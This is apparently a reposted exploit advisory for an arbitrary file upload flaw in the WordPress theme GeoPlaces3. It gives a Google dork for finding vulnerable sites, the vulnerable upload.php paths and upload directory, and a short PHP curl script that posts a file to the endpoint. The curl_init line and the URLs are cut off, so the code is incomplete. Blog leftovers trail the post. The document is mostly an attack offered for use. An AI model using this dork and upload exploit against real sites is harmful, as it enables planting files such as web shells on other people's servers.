# Description : Wordpress Themes GeoPlaces3 - Arbitrary File Upload vulnerbility
# Google Dork: inurl:/wp-content/themes/GeoPlaces3/
# Date: 23 August 2015
# Vendor Homepage: http:
# Tested on: Win 7 & Win 8.1
# Author: Mdn_Newbie | Gantengers Crew
# https:
##################################################################################
Exploit : wp-content/themes/GeoPlaces3/library/includes/upload.php
wp-content/themes/GeoPlaces3/library/includes/upload_3feb.php
Path : /wp-content/uploads/tmp/
<?php
$uploadfile="m.jpg";
$ch =
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
# 0day.today [2015-08-25]
# fb.com/inj3ct0rs and twitter.com/inj3ct0r
.png)
By
18:05
0 yorum